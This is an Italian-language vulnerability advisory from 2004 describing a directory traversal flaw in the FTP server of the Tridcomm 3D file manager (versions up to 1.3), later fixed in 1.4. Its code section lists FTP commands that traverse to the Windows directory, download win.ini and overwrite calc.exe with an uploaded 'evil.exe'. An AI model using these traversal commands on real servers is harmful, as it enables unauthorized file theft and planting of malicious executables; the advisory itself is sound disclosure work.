#######################################################################

                             Luigi Auriemma

Applicazione: Tridcomm
              http://www.tridcomm.com
Versioni:     <= 1.3
Piattaforme:  Windows
Bug:          directory traversal (sia in download che upload)
Exploitation: remoto, contro il server FTP
Data:         06 Ottobre 2004
Autore:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduzione
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduzione
===============


Tridcomm e' un file manager 3D open-source per Windows con un server
FTP implementato al suo interno e disabilitato di default.


#######################################################################

======
2) Bug
======


L'FTP server esistente in Tridcomm e' vulnerabile ad un directory
traversal bug.
Praticamente un attacker puo' guardare in ogni directory e caricare e
scaricare qualsiasi file sul disco ove Tridcomm e' installato.


#######################################################################

===========
3) The Code
===========


dir ../../
dir /

get
  ../../windows/win.ini
  win.ini

put
  evil.exe
  ../../windows/calc.exe

(gli stessi esempi possono essere usati anche con il backslash)


#######################################################################

======
4) Fix
======


No fix.
Nessuna risposta dall'autore.

UPDATE: e' stata rilasciata la versione 1.4 che corregge tale bug.


#######################################################################